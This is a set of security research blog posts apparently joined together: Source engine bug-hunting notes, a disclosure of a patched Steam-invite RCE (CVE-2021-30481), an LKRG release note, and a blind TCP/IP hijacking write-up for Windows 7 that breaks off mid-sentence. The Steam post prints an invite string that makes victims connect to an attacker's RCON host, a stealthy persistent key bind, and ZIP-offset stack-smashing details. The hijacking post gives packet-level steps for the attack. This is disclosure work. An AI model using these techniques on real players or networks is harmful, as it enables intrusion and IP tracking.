The second part, the game, consists of two main parts, client.dll and server.dll. These binaries contain the compiled game that will use the engine. Both of these dlls will utilize engine.dll heavily in order to function. Inside of client.dll, you will find the code responsible for the GUI subsystem (named VGUI) of the game and the clientside logic of the actual game itself. Inside of server.dll, you will find all of the code to communicate the game’s serverside logic to the remote player’s client.dll. Both of these dlls are found in /[gamedir]/bin/*.dll, where [gamedir] is the game abbreviation (csgo, tf2, etc.).

Both the server and client have shared code that defines the entities of the game and variables that will be synchronized. Shared code is compiled directly into each binary, but some C macro design ensures that only the server parts compile to server.dll, and vice-versa. The engine.dll entity system will synchronize the server’s simulation of the game, and the client’s dll will take these simulations and display them to the player through the engine.dll renderer.

Lastly, a big feature of all Source games that was taken and evolved from the Quake engine is the ConVar system. This system defines a series of variables and commands that are executed on an internal command line, very similar to a cmd.exe or /bin/sh shell. The difference is that, instead of executing new processes, these commands will run functions on either the client or server depending on where its run. The engine defines some low-level ConVars found on both the server and client, while the game dlls add more on top of that depending on the game dll that’s running.

  • A Console Variable (ConVar) takes the form of <name> <value>, where the value can be numerical or string based. Typically used for configuration, certain special ConVars will be synchronized. The server can always request the value of a client’s ConVar. Example: sv_cheats 1 sets the ConVar sv_cheats to 1, which enables cheats.
  • A Console Command (ConCommand) takes the form of <name> <arg0> <arg1> …, and defines a command with a backing C++ function that can be run from the developer console. Sometimes, it is used by the game or the engine to run remote functions (client -> server, server -> client). Example: changelevel de_dust executes the command changelevel with the argument de_dust, which changes the current map when run on the server console.

This is just an intro, more on all of this to follow in future posts.

The Bugs:

All of this old code and custom formats is fantastic for a bug hunter. In 2018, all that’s truly necessary to perform a full chain RCE is a good memory corruption bug to take control and an information leak to bypass ASLR. Typically, the former is the most difficult part of bug hunting in modern software, but later you will see that, for the SE, it is actually the latter.

Here is an overview of the Windows binaries:

  • 32-bit binaries
  • NX - Enabled
  • Full ASLR - Enabled (recently)
  • Stack Cookies - Disabled (in the cases it matters)

If you’re an exploit developer, you would probably find the lack of stack cookies in a game engine with millions of players to be a very shocking discovery. This is a vital shortcoming of the already aging engine, and is essentially unheard of in modern Windows binaries. Valve is well aware of this protection’s existence, and has chosen time and time again not to enable it. I have some speculation as to why this is not enabled (most likely performance or build breaking issues), but regardless, there is a huge point to make: Any controllable stack overflow can overwrite the instruction pointer and divert code execution.

Considering how much the stack is used in this engine, this is a huge benefit to bug hunters. One simple out-of-bounds (OOB) string copy, such as a call to strcpy, will result in swift compromise of the instruction pointer straight into RCE. My first bug, unsurprisingly, is a stack overflow bug, not much different than you would find in a beginner level CTF challenge. But, unlike the CTF, its implications of a full client machine compromise in a series of games with a huge player base leads to the large payout.

Hunting:

When hunting for these bugs, I chose to take a slightly more difficult path of only performing manual code auditing on the publicly available engine code. What this allows me to do is both search for potentially useful bugs and also learn the engine’s internals along the way. While it might be enticing for me to just fuzz a file format and get lots of crashes, fuzzing tends to find surface level bugs that everyone’s finding, and never those really deep, interesting bugs that no one is finding.

As I said previously, the codebase for this engine is gigantic. You should take advantage of all of the tools available to you when searching. My preferred toolset is this:

  • Following code structure and searches using Visual Studio with Resharper++.
  • Cmder (with grep) to search for patterns.
  • IDA Pro to prove the existence of the bug in the newest build.
  • WinDbg and x64dbg to attach to the game and try to trigger the bug.
  • Sourcemod extensions to modify the server for proof-of-concepts

With these tools, my general “process” for bug hunting is this:

  1. Find some section of the client code I feel is exploitable and want to look into more closely

  2. Start reading code. I’ll read for hours until I come across what I think is a possible exploitable bug.

  3. From there, I will open up IDA Pro and locate the function I think is exploitable, then compare its current code with the old, public code I have available.

  4. If it still appears to be exploitable, I will try to find some method to trigger the exploitable function from in-game. This turns out to be one of the hardest parts of the process, because finding a triggerable path to that function is a very difficult task given the size of the engine. Sometimes, the server just can’t trigger the bug remotely. Some familiarity with the engine goes a long way here.

  5. Lastly, I will write Sourcemod plugins that will help me trigger it from a game server to the client, hoping to finally prove the existence of the bug and the exploitability in a proof-of-concept.

Next Time

Next post, I will go more in-depth into the codebase of the Engine and explain the entity and networking system that the Engine utilizes to run the game itself. Also, I will begin introducing some of the techniques I used to write the exploits, including the ASLR and NX bypass. There’s a whole lot more to talk about, and this post barely scratches the service. At the moment, I’m in the process of working on a new undisclosed bug in the engine. Hoping to turn this one into another big payout. Wish me luck!

— Gbps

CVE-2021-30481: Source engine remote code execution via game invites

Steam is the most popular PC game launcher in the world. It gives millions of people the chance to play their favorite video games with their friends using the built in friend and party system, so it’s safe to assume most users have accepted an invite at one point or another. There’s no real danger in that, is there?

In this blog post, we will look at how an attacker can use the Steamworks API in combination with various features and properties of the Source engine to gain remote code execution (RCE) through malicious Steam game invites.

Why game invites do more than you think they do

The Steamworks API allows game developers to access various Steam features from within their game through a set of different interfaces. For example, the ISteamFriends interface implements functions such as InviteUserToGame and ReplyToFriendMessage, which, as their names suggest, let you interact with your friends either by inviting them to your game or by just sending them a text message. How can this become a problem?

Things become interesting when looking at what InviteUserToGame actually does to get a friend into your current game/lobby. Here, you can see the function prototype and an excerpt of the description from the official documentation:

bool InviteUserToGame( CSteamID steamIDFriend, const char *pchConnectString );

“If the target user accepts the invite then the pchConnectString gets added to the command-line when launching the game. If the game is already running for that user, then they will receive a GameRichPresenceJoinRequested_t callback with the connect string.”

Basically, that means that if your friends do not already have the game started, you can specify additional start parameters for the game process, which will be appended at the end of the command line. For regular invites in the context of, e.g., CS:GO, the start parameter +connect_lobby in combination with your 64-bit lobby ID is appended. This very command, in turn, is executed by your in-game console and eventually gets you into the specified lobby. But where is the problem now?

When specifying console commands in the start parameters of a Source engine game, you are not given any limitations. You can arbitrarily execute any game command of your choice. Here, you can now give free rein to your creativity; everything you can configure in the UI and much more beyond that can generally be tweaked with using console commands. This allows for funny things as messing with people’s game language, their sensitivity, resolution, and generally everything settings-related you can think of. In my opinion, this is already quite questionable but not extremely malicious yet.

Using console commands to build up an RCON connection

A lot of Source engine games come with something that is known as the Source RCON Protocol. Briefly summarized, this protocol enables server owners to execute console commands in the context of their game servers in the same manner as you would typically do it to configure something in your game client. This works by prefixing any console command with rcon before executing it. In order to do so, this requires you to previously connect and authenticate yourself to the game server using the rcon_address and rcon_password commands. You might already know where this is going… An attacker can execute the InviteUserToGame function with the second parameter set to "+rcon_address yourip:yourport +rcon". As soon as the victims accept the invite, the game will start up and try to connect back to the specified address without any notification whatsoever. Note that the additional +rcon at the end is required because the client does not initiate the connection until there is an attempt to actually communicate to the server. All of this is already very concerning as such invites inherently leak the victim’s IP address to the attacker.

Abusing the RCON connection

A further look into how the Source engine implements RCON on the client-side reveals the full potential. In CRConClient::ParseReceivedData, we can see how the client reacts to different types of RCON packets coming from the server. Within the scope of this work, we only look at the following three types of packets: SERVERDATA_RESPONSE_STRING, SERVERDATA_SCREENSHOT_RESPONSE, and SERVERDATA_CONSOLE_LOG_RESPONSE. The following image 1 shows how RCON packets look like in general. The content delivered by the packet starts with the Body member and is typically null-terminated with the Empty String field.

Now, starting with the first type, it allows an attacker hosting a malicious RCON server to print arbitrary strings into the connected victim’s game console as long as the RCON connection remains open. This is not related to the final RCE, but it is too funny to just leave it out. Below, there is an example of something that would certainly be surprising to anybody who sees it popping up in their console.

Let’s move on to the exciting part. To simplify matters, we will only explain how the client handles SERVERDATA_SCREENSHOT_RESPONSE packets as the code is almost exactly the same for SERVERDATA_CONSOLE_LOG_RESPONSE packets. Eventually, the client treats the packet data it receives as a ZIP file and tries to find a file with the name screenshot.jpg inside. This file is then subsequently unpacked to the root CS:GO installation folder. Unfortunately, we cannot control the name under which the screenshot is saved on the disk nor can we control the file extension. The screenshot is always saved as screenshotXXXX.jpg where XXXX represents a 4-digit suffix starting at 0000, which is increased as long as a file with that name already exists.

void CRConClient::SaveRemoteScreenshot( const void* pBuffer, int nBufLen )
{
	char pScreenshotPath[MAX_PATH];
	do 
	{
		Q_snprintf( pScreenshotPath, sizeof( pScreenshotPath ), "%s/screenshot%04d.jpg", m_RemoteFileDir.Get(), m_nScreenShotIndex++ );	
	} while ( g_pFullFileSystem->FileExists( pScreenshotPath, "MOD" ) );

	char pFullPath[MAX_PATH];
	GetModSubdirectory( pScreenshotPath, pFullPath, sizeof(pFullPath) );
	HZIP hZip = OpenZip( (void*)pBuffer, nBufLen, ZIP_MEMORY );

	int nIndex;
	ZIPENTRY zipInfo;
	FindZipItem( hZip, "screenshot.jpg", true, &nIndex, &zipInfo );
	if ( nIndex >= 0 )
	{
		UnzipItem( hZip, nIndex, pFullPath, 0, ZIP_FILENAME );
	}
	CloseZip( hZip );
}

Note that an attacker can send these kinds of RCON packets without the client requesting anything prior. Already, an attacker can upload arbitrary files if the victim accepts the game invite. So far, there is no memory corruption required yet.

Integer underflow in FindZipItem leads to remote code execution

The functions OpenZip, FindZipItem, UnzipItem, and CloseZip belong to a library called XZip/XUnzip. The specific version of the library which is used by the RCON handler dates back to 2003. While we found several flaws in the implementation, we will only focus on the first one that helped us get code execution.

As soon as CRConClient::SaveRemoteScreenshot calls FindZipItem to retrieve information about the screenshot.jpg file inside the archive, TUnzip::Get is called. Inside TUnzip::Get, the archive is parsed according to the ZIP file format. This includes processing the so-called central directory file header.

int unzlocal_GetCurrentFileInfoInternal (unzFile file, unz_file_info *pfile_info,
   unz_file_info_internal *pfile_info_internal, char *szFileName,
   uLong fileNameBufferSize, void *extraField, uLong extraFieldBufferSize,
   char *szComment, uLong commentBufferSize)
{
	// ...
	s=(unz_s*)file;
	// ...
	if (unzlocal_getLong(s->file,&file_info_internal.offset_curfile) != UNZ_OK)
		err=UNZ_ERRNO;
	// ...
}

In the code above, the relative offset of the local file header located in the central directory file header is read into file_info_internal.offset_curfile. This allows to locate the actual position of the compressed file in the archive, and it will play a key role later on.

Somewhere later in TUnzip::Get, a function with the name unzlocal_CheckCurrentFileCoherencyHeader is called. Here, the previously mentioned local file header is now processed given the offset that was retrieved before. This is what the corresponding code looks like:

int unzlocal_CheckCurrentFileCoherencyHeader (unz_s *s,uInt *piSizeVar,
   uLong *poffset_local_extrafield, uInt  *psize_local_extrafield)
{
	// ...
	if (lufseek(s->file,s->cur_file_info_internal.offset_curfile + s->byte_before_the_zipfile,SEEK_SET)!=0)
		return UNZ_ERRNO;


	if (err==UNZ_OK)
		if (unzlocal_getLong(s->file,&uMagic) != UNZ_OK)
			err=UNZ_ERRNO;
	// ...
}

At first, a call to lufseek sets the internal file pointer to point to the local file header in the archive (here, it can be assumed that there are no additional bytes in front of the archive).

From this assumption it follows that s->byte_before_the_zipfile is 0.

This is very similar to how dealing with files works in the C standard library. In our specific case, the RCON handler opened the ZIP archive with the ZIP_MEMORY flag, thus specifying that the archive is essentially just a byte blob in memory. Therefore, calls to lufseek only update a member in the file object.

int lufseek(LUFILE *stream, long offset, int whence)
{
	// ...
	else
	{ 
		if (whence==SEEK_SET) stream->pos=offset;
		else if (whence==SEEK_CUR) stream->pos+=offset;
		else if (whence==SEEK_END) stream->pos=stream->len+offset;
		return 0;
	}
}

Once lufseek returns, another function with the name unzlocal_getLong is invoked to read out the magic bytes that identify the local file header. Internally, this function calls unzlocal_getByte four times to read out every single byte of the long value. unzlocal_getByte in turn calls lufread to directly read from the file stream.

int unzlocal_getLong(LUFILE *fin,uLong *pX)
{
	uLong x ;
	int i = 0;
	int err;

	err = unzlocal_getByte(fin,&i);
	x = (uLong)i;

	if (err==UNZ_OK)
		err = unzlocal_getByte(fin,&i);
	x += ((uLong)i)<<8;

	// repeated two more times for the remaining bytes
	// ...
	return err;
}

int unzlocal_getByte(LUFILE *fin,int *pi)
{
	unsigned char c;
	int err = (int)lufread(&c, 1, 1, fin);
	// ...
}

size_t lufread(void *ptr,size_t size,size_t n,LUFILE *stream)
{
	unsigned int toread = (unsigned int)(size*n);
	// ...
	if (stream->pos+toread > stream->len) toread = stream->len-stream->pos;
	memcpy(ptr, (char*)stream->buf + stream->pos, toread); DWORD red = toread;
	stream->pos += red;
	return red/size;
}

Given the fact that s->cur_file_info_internal.offset_curfile can be arbitrarily controlled by modifying the corresponding field in the central directory structure, the stack can be smashed in the first call to lufread right on the spot. If you set the local file header offset to 0xFFFFFFFE a chain of operations eventually leads to code execution.

First, the call to lufseek in unzlocal_CheckCurrentFileCoherencyHeader will set the pos member of the file stream to 0xFFFFFFFE. When unzlocal_getLong is called for the first time, unzlocal_getByte is also invoked. lufread then tries to read a single byte from the file stream. The variable toread inside lufread that determines the amount of memory to be read will be equal to 1 and therefore the condition if (stream->pos + toread > stream->len) (unsigned comparison) becomes true. stream->pos + toread calculates 0xFFFFFFFE + 1 = 0xFFFFFFFF and thus is likely greater than the overall length of the archive which is stored in stream->len. Next, the toread variable is updated with stream->len - stream->pos which calculates stream->len - 0xFFFFFFFE. This calculation underflows and effectively computes stream->len + 2. Note how in the call to memcpy the calculation of the source parameter overflows simultaneously. Finally, the call to memcpy can be considered equivalent to this:

memcpy(ptr, (char*)stream->buf - 2, stream->len + 2);

Given that ptr points to a local variable of unzlocal_getByte that is just a single byte in size, this immediately corrupts the stack.

unzlocal_getByte calls lufread(&c, 1, 1, fin) with c being an unsigned char.

Luckily, the memcpy call writes the entire archive blob to the stack, enabling us to also control the content of what is written.

At this point, all that is left to do is constructing a ZIP archive that has the local file header offset set to 0xFFFFFFFE and otherwise primarily consists of ROP gadgets only. To do so, we started with a legitimate archive that contains a single screenshot file. Then, we proceeded to corrupt the offset as mentioned above and observed where to put the gadgets at based on the faulting EIP value. For the ROP chain itself, we exploited the fact that one of the DLLs loaded into the game called xinput1_3.dll has ASLR disabled. That being said, its base address can be somewhat reliably guessed. The exploit only ever fails when its preferred address is already occupied by another DLL. Without doing proper statistical measurements, the probability of the exploit to work is estimated to be somewhere around 80%. For more details on this, feel free to check out the PoC, which is linked in the last section of this article.

Advancing the RCE even more

Interestingly, at the very end, you can once again see how this exploit benefits from the start parameter injection and the RCON capabilities.

Let’s start with the apparent fact that the arbitrary file upload, which was discussed previously, greatly helps this exploit to reach its full potential. One shellcode to rule them all or in other words: Whether you want to execute the calculator or a malicious binary you previously uploaded, it really does not matter. All that needs to be done is changing a single string in the exploit shellcode. It does not matter if your binary has been saved with the .png extension.

Finally, there is still something that can be done to make the exploit more powerful. We cannot change the fact that the exploit attempts fail from time to time due to bad luck with the base addresses, but what if we had unlimited tries to attempt the code execution? Seems unreasonable? It actually is very reasonable.

The Source engine comes with the console command host_writeconfig that allows us to write out the current game configuration to the config file on the disk. Obviously, we can also inject this command using game invites. Right before doing that, however, we can use bind to configure any key that is frequently pressed by players to execute the RCON connection commands from the very beginning. Bonus points if you make the keys maintain their original functionality to remain stealthy. Once we configured such a key, we can write out the settings to the disk so that the changes become persistent. Here is an example showing how the tab key can be stealthily configured to initiate an outgoing RCON connection each time it is pressed.

+bind "tab" "+showscores;rcon_address ip:port;rcon" +host_writeconfig

Now, after accepting just a single invite, you can try to run the exploit on your victims whenever they look at the scoreboard.

Also bind +showscores as that way tab keeps showing the scoreboard.

Timeline and final words

  • [2019-06-05] Reported to Valve on HackerOne
  • [2019-09-14] Bug triaged
  • [2020-10-23] Bounty paid ($8000) & notification that initial fix was deployed in Team Fortress 2
  • [2021-04-17] Final patch

PoC exploit code can be found on my github. The vulnerability was given a severity rating of 9.0 (critical) by Valve.

The recent updates make it impossible to carry out this exploit any longer. First of all, Valve removed the offending RCON command handlers making the arbitrary file upload and the code execution in the unzipping code impossible. Also, at least for CS:GO, Valve seems to now use GetLaunchCommandLine instead of the OS command line. However, in CS:S (and maybe other games?) the OS command line apparently is still in use. After all, at least a warning is displayed that shows the parameters your game is about to start with for those games. The next image shows how such a warning would look like when accepting an invite that rebinds a key and establishes an RCON connection at the same time.

Remember that if you click Ok here, you are more or less agreeing to install a persistent IP logger.

At the very end, I would like to talk about a different matter. Personally, it is imperative to say a few final words about the situation with Valve and their bug bounty program. To sum up, the public disclosure about the existence of this bug has caused quite a stir regarding Valve’s slow response times to bugs. I never wanted to just point the finger at Valve and complain about my experiences; I want to actually change something in the long run too. The efforts that other researchers have put and are going to put into the search for bugs should not be in vain. Hopefully, things will improve in the future so we can happily work with Valve again to enhance the security of their games.

  1. https://developer.valvesoftware.com/wiki/Source_RCON_Protocol 

LKRG 0.9.0 has been released!

During LKRG development and testing I’ve found 7 Linux kernel bugs, 4 of them have CVE numbers (however, 1 CVE number covers 2 bugs):

CVE-2021-3411  - Linux kernel: broken KRETPROBES and OPTIMIZER
CVE-2020-27825 - Linux kernel: Use-After-Free in the ftrace ring buffer
                 resizing logic due to a race condition
CVE-2020-25220 - Linux kernel Use-After-Free in backported patch for
                 CVE-2020-14356 (affected kernels: 4.9.x before 4.9.233,
                 4.14.x before 4.14.194, and 4.19.x before 4.19.140)
CVE-2020-14356 - Linux kernel Use-After-Free in cgroup BPF component
                 (affected kernels: since 4.5+ up to 5.7.10)

I’ve also found 2 other issues related to the ftrace UAF bug (CVE-2020-27825):

  • Deadlock issue which was not really addressed and devs said they will take a look and there is not much updates on that.
  • Problem with the code related to hwlatd kernel thread – it is incorrectly synchronizing with launcher / killer of it. You can have WARN in kernels all the time.

CVE-2021-3411 refers to 2 different type of bugs:

  • Broken KRETPROBE (recently reported)
  • Incompatibility of KPROBE optimizer with the latest changes in the linker.

Additionally, I’ve also found a bug with the kernel signal handling in dying process:

CVE-2020-12826 – Linux kernel prior to 5.6.5 does not sufficiently restrict exit signals

However, I don’t remember if I found it during my work related to LKRG so I’m not counting it here (otherwise it would be total 8 bugs while 5 of them would have CVE).

That’s pretty bad stats… However, it might be an interesting story to say during LKRG announcement of the new version. It could be also interesting talk for conference.

Full announcement can be read here:
https://www.openwall.com/lists/announce/2021/04/12/1

Best regards,
Adam

Windows 7 TCP/IP hijacking

Blind TCP/IP hijacking is still alive on Windows 7… and not only. This version of Windows is certainly one of the “juiciest” targets even though January 14th 2020 was the official EOL (End Of Life) for it. Based on various data Windows 7 holds around 25% share of the Operating Systems (OS) market and is still the world’s second most popular desktop operating system.

A little bit of history

It was a few months before I joined Microsoft as a Security Software Engineer in 2012 when I sent them a report with an interesting bug/vulnerability in all versions of Microsoft Windows including Windows 7 (the latest version at that time). It was an issue in the implementation of TCP/IP stack allowing attackers to carry out a blind TCP/IP hijacking attack. During my discussion with MSRC (Microsoft Security Response Center) they acknowledged the bug exists, but they had their doubts about the impact of the issue claiming “it is very difficult and very unreliable” to exploit. Therefore, they were not going to address it in the current OSes. However, they would fix it in the upcoming OS which was going to be released soon (Windows 8).

I didn’t agree with MSRC’s evaluation. In 2008 I developed a fully working PoC which would automatically find all the necessary primitives (client’s port, SQN and ACK) to perform blind TCP/IP hijacking attack. This tool was exploiting exactly the same weaknesses in TCP/IP stack which I’ve reported. That being said, Microsoft informed me that if I share my tool (I didn’t want to do it), they would reconsider their decision. However, for now, no CVE would be allocated, and this problem was supposed to be addresses in Windows 8.

In the next months I started my work as FTE (Full Time Employee) for Microsoft, and I verified that this problem was fixed in Windows 8.  Over the course of years, I completely forgot about it. Nevertheless, when I left Microsoft, I was doing some cleanups on my old laptop and found my old tool. I copied it from the laptop and decided to re-visit it once I will have a bit more time. I found some time and thought that my tool deserves a release and a proper description.

What is TCP/IP hijacking?

Most likely majority of the readers are aware what this is. For those who don’t, I encourage you to read many great articles about it which you can find on the internet these days.

It might be worth to mention that probably the most famous blind TCP/IP hijacking attack was done by Kevin Mitnick against the computers of Tsutomu Shimomura at the San Diego Supercomputer Center on Christmas Day, 1994.

This is a VERY old-school technique which nobody expects to be alive in 2021… Yet, it’s still possible to perform TCP/IP session hijacking today without attacking the PRNG responsible for generating the initials TCP sequence numbers (ISN).

What is the impact of TCP/IP hijacking nowadays?

(Un)fortunately it is not as catastrophic as it used to be. The main reason is that majority of the modern protocols do implement encryption. Sure, it’s overwhelmingly bad if attacker can hijack any TCP/IP session which is established. However, if the upper-layer protocols properly implement encryption, attackers are limited in terms of what they can do with it. Unless they have ability to correctly generate encrypted messages.

That being said, we still have widely deployed protocols which do not encrypt the traffic, e.g., FTP, SMTP, HTTP, DNS, IMAP, and more. Thankfully, protocols like Telnet or Rlogin (hopefully?) can be seen only in the museum.

Where is the bug?

TL;DR: In the implementation of TCP/IP stack for Windows 7, IP_ID is a global counter.

Details:

The tool which I developed in 2008 was implementing a known attack described by ‘lkm’ (there is a typo and real nickname of the author is ‘klm’) in Phrack 64 magazine and can be read here:

http://phrack.org/issues/64/13.html

This is an amazing article (research) and I encourage everyone to carefully study all the details.

Back in 2007 (and 2008) this attack could be executed successfully on many modern OS (modern at that time) including Windows 2K/XP or FreeBSD 4. I gave a live presentation of this attack against Windows XP on a local conference in Poland (SysDay 2009).

Before we move to the details on how to perform described attack, it is useful to refresh how TCP handles the communication in more details. Quoting phrack paper:

Each of the two hosts involved in the connection computes a 32bits SEQ number randomly at the establishment of the connection. This initial SEQ number is called the ISN. Then, each time an host sends some packet with N bytes of data, it adds N to the SEQ number.

The sender put his current SEQ in the SEQ field of each outgoing TCP packet. The ACK field is filled with the next expected SEQ number from the other host. Each host will maintain his own next sequence number (called SND.NEXT), and next expected SEQ number from the other host (called RCV.NEXT.
(…)
TCP implements a flow control mechanism by defining the concept of “window”. Each host has a TCP window size (which is dynamic, specific to each TCP connection, and announced in TCP packets), that we will call RCV.WND.
At any given time, a host will accept bytes with sequence number between RCV.NXT and (RCV.NXT+RCV.WND-1). This mechanism ensures that at any time, there can be no more than RCV.WND bytes “in transit” to the host.

In short, in order to execute TCP/IP hijacking attack, we must know:

  • Client IP
  • Server IP (usually known)
  • Client port
  • Server port (usually known)
  • Sequence number of the client
  • Sequence number of the server

OK, but what it has to do with IP ID?

In 1998(!), Salvatore Sanfilippo (aka antirez) posted in the Bugtraq mailing list a description of a new port scanning technique which is known today as an “Idle scan”. Original post can be found here:

https://seclists.org/bugtraq/1998/Dec/79

and more information about Idle scan you can read here:

https://nmap.org/book/idlescan.html

In short, if IP_ID is implemented as a global counter (which is the case e.g., in Windows 7), it is simply incremented with each sent IP packet. By “probing” the IP_ID of the victim we know how many packets have been sent between each “probe”. Such “probing” can be performed by sending any packet to the victim which results in a reply to the attacker. ‘lkm’ suggests using an ICMP packet, but it can be any packet with IP header:

[===================================================================]
attacker                                  Host
                --[PING]->
        <-[PING REPLY, IP_ID=1000]--

          ... wait a little ... 

                --[PING]->
        <-[PING REPLY, IP_ID=1010]-- 

<attacker> Uh oh, the Host sent 9 IP packets between my pings.
[===================================================================]

This essentially creates some form of “covert channel” which can be exploited by remote attacker to “discover” all the necessary information to execute TCP/IP Hijacking attack. How? Let’s quote the original phrack article:

Discovering client’s port

Assuming we already know the client/server IP, and the server port, there’s a well known method to test if a given port is the correct client port. In order to do this, we can send a TCP packet with the SYN flag set to server-IP:server-port, from client-IP:guessed-client-port (we need to be able to send spoofed IP packets for this technique to work).

When attacker guessed the valid client’s port, server replies to the real client (not attacker) with ACK. If port was incorrect, server replies to the real client with SYN+ACK. A real client didn’t start a new connection so it replies to the server with RST.

So, all we have to do to test if a guessed client-port is the correct one
is:

– Send a PING to the client, note the IP ID
– Send our spoofed SYN packet
– Resend a PING to the client, note the new IP ID
– Compare the two IP IDs to determine if the guessed port was correct.

Finding the server’s SND.NEXT

This is the essential part, and the best what I can do is to quote (again) phrack article:

Whenever a host receive a TCP packet with the good source/destination ports, but an incorrect seq and/or ack, it sends back a simple ACK with the correct SEQ/ACK numbers. Before we investigate this matter, let’s define exactly what is a correct seq/ack combination, as defined by the RFC793 [2]:

A correct SEQ is a SEQ which is between the RCV.NEXT and (RCV.NEXT+RCV.WND-1) of the host receiving the packet. Typically, the RCV.WND is a fairly large number (several dozens of kilobytes at last).

A correct ACK is an ACK which corresponds to a sequence number of something the host receiving the ACK has already sent. That is, the ACK field of the packet received by an host must be lower or equal than the host’s own current SND.SEQ, otherwise the ACK is invalid (you can’t acknowledge data that were never sent!).

It is important to node that the sequence number space is “circular”. For exemple, the condition used by the receiving host to check the ACK validity is not simply the unsigned comparison “ACK <= receiver’s SND.NEXT”, but the signed comparison “(ACK – receiver’s SND.NEXT) <= 0”.

Now, let’s return to our original problem: we want to guess server’s SND.NEXT. We know that if we send a wrong SEQ or ACK to the client from the server, the client will send back an ACK, while if we guess right, the client will send nothing. As for the client-port detection, this may be tested with the IP ID.

If we look at the ACK checking formula, we note that if we pick randomly two ACK values, let’s call them ack1 and ack2, such as |ack1-ack2| = 2^31, then exactly one of them will be valid. For example, let ack1=0 and ack2=2^31. If the real ACK is between 1 and 2^31 then the ack2 will be an acceptable ack. If the real ACK is 0, or is between (2^32 – 1) and (2^31 + 1), then, the ack1 will be acceptable.

Taking this into consideration, we can more easily scan the sequence number space to find the server’s SND.NEXT. Each guess will involve the sending of two packets, each with its SEQ field set to the guessed server’s SND.NEXT. The first packet (resp. second packet) will have his ACK field set to ack1 (resp. ack2), so that we are sure that if the guessed’s SND.NEXT is correct, at least one of the two packet will be accepted.

The sequence number space is way bigger than the client-port space, but two facts make this scan easier:

First, when the client receive our packet, it replies immediately. There’s not a problem with latency between client and server like in the client-port scan. Thus, the time between the two IP ID probes can be very small, speeding up our scanning and reducing greatly the odds that the client will have IP traffic between our probes and mess with our detection.

Secondly, it’s not necessary to test all the possible sequence numbers, because of the receiver’s window. In fact, we need only to do approx. (2^32 / client’s RCV.WND) guesses at worst (this fact has already been mentionned in [6]). Of course, we don’t know the client’s RCV.WND.
We can take a wild guess of RCV.WND=64K, perform the scan (trying each SEQ multiple of 64K). Then, if we didn’t find anything, wen can try all SEQs such as seq = 32K + i64K for all i. Then, all SEQ such as seq=16k + i32k, and so on… narrowing the window, while avoiding to re-test already tried SEQs. On a typical “modern” connection, this scan usually takes less than 15 minutes with our tool.

With the server’s SND.NEXT known, and a method to work around our ignorance of the ACK, we may hijack the connection in the way “server -> client”. This is not bad, but not terribly useful, we’d prefer to be able to send data from the client to the server, to make the client execute a command, etc… In order to do this, we need to find the client’s SND.NEXT.

And here is a small, weird difference in Windows 7. Described scenario perfectly works for Windows XP but I’ve encountered a different behavior in Windows 7. Having two edge cases as ACK value to fulfill ACK formula doesn’t really change anything and I have exactly the same results (just in Windows 7) just by always using one of the edge values for ACK. Originally, I thought that my implementation of attack is not working against Windows 7. However, after some tests and tuning it turns out that’s not the case. I’m not sure why or what I’m missing but, in the end, you can send less packages (twice less) and speed-up the overall attack.

Finding the client’s SND.NEXT

Quote:

What we can do to find the client’s SND.NEXT ? Obviously we can’t use the same method as for the server’s SND.NEXT, because the server’s OS is probably not vunerable to this attack, and besides, the heavy network traffic on the server would render the IP ID analysis infeasible.

However, we know the server’s SND.NEXT. We also know that the client’s SND.NEXT is used for checking the ACK fields of client’s incoming packets.
So we can send packets from the server to the client with SEQ field set to server’s SND.NEXT, pick an ACK, and determine (again with IP ID) if our ACK was acceptable.

If we detect that our ACK was acceptable, that means that (guessed_ACK – SND.NEXT) <= 0. Otherwise, it means.. well, you guessed it, that (guessed_ACK – SND_NEXT) > 0.

Using this knowledge, we can find the exact SND_NEXT in at most 32 tries by doing a binary search (a slightly modified one, because the sequence space is circular).

Now, at last we have all the required informations and we can perform the session hijacking from either client or server.

(Un)fortunately, here Windows 7 is different as well. This is connected to the differences in the previous stage of how it handles correctness of ACK. Regardless of the guessed_ACK value ((guessed_ACK - SND.NEXT) <= 0 or (guessed_ACK - SND_NEXT) > 0) Windows 7 won’t send any package back to the server. Essentially, we are blind here and we can’t do the same amazingly effective ‘binary search’ to find the correct ACK. However, we are not completely lost here. We can always brute force ACK if we have the correct SQN. Again, we don’t need to verify every possible value of ACK, we can still use the same trick with TCP window size. Nevertheless, to be more effective and not miss the correct ACK brackets, I’ve chosen to use window size value as 0x3FF. Essentially, we are flooding the server with the spoofed packets containing our payload for injection, with the correct SQN and guessed ACK. This operation takes around 5 minutes and is effective 🙂 Nevertheless, if for any reason our payload is not injected, a smaller TCP window size (e.g., 0xFF) should be chosen.

Important notes

  1. This type of attack is not limited to any specific OS, but rather leverages “covert channel” generated by implementing IP_ID as a global counter. In short, any OS which is vulnerable to the “Idle scan” is also vulnerable to the old-school blind TCP/IP Hijacking attack.
  2. We need to be able to send spoofed IP packets to execute this attack.
    • Our attack relies on “scanning” and constant “poking” of IP_ID:
    • Any latency between victim and the server affects such logic.
    • If victim’s machine is overloaded (heavy or slow traffic) it obviously affects the attack. Taking appropriate measures of the victim’s networking performance might be necessary for correct tuning of the attack.

Proof-of-Concept

Originally, I implemented lkm’s attack in 2008 and I tested it against Windows XP. When I ran compiled binary on the modern system, everything was working fine. However, when I took the original sources and wanted to recompile it on the modern Linux environment, my tool stopped working(!). New binary was not able to find client’s port neither SQN. However, old binary still worked perfectly fine. It was a riddle for me what was really happening. Output of strace tool gave me some clues:

Generated packet from the old binary:

sendmsg(4, {msg_name={sa_family=AF_INET, sin_port=htons(21), sin_addr=inet_addr("192.168.1.169")}, msg_namelen=16, msg_iov=[{iov_base="E\0\0(\0\0\0\0@\6\0\0\300\250\1\356\300\250\1\251\277\314\0\25\0\0\0224\0\0VxP\2\26\320\353\234\0\0", iov_len=40}], msg_iovlen=1, msg_control=[{cmsg_len=24, cmsg_level=SOL_IP, cmsg_type=IP_PKTINFO, cmsg_data={ipi_ifindex=0, ipi_spec_dst=inet_addr("0.0.0.0"), ipi_addr=inet_addr("0.0.0.0")}}], msg_controllen=24, msg_flags=0}, 0) = 40

Generated packet from the new binary:

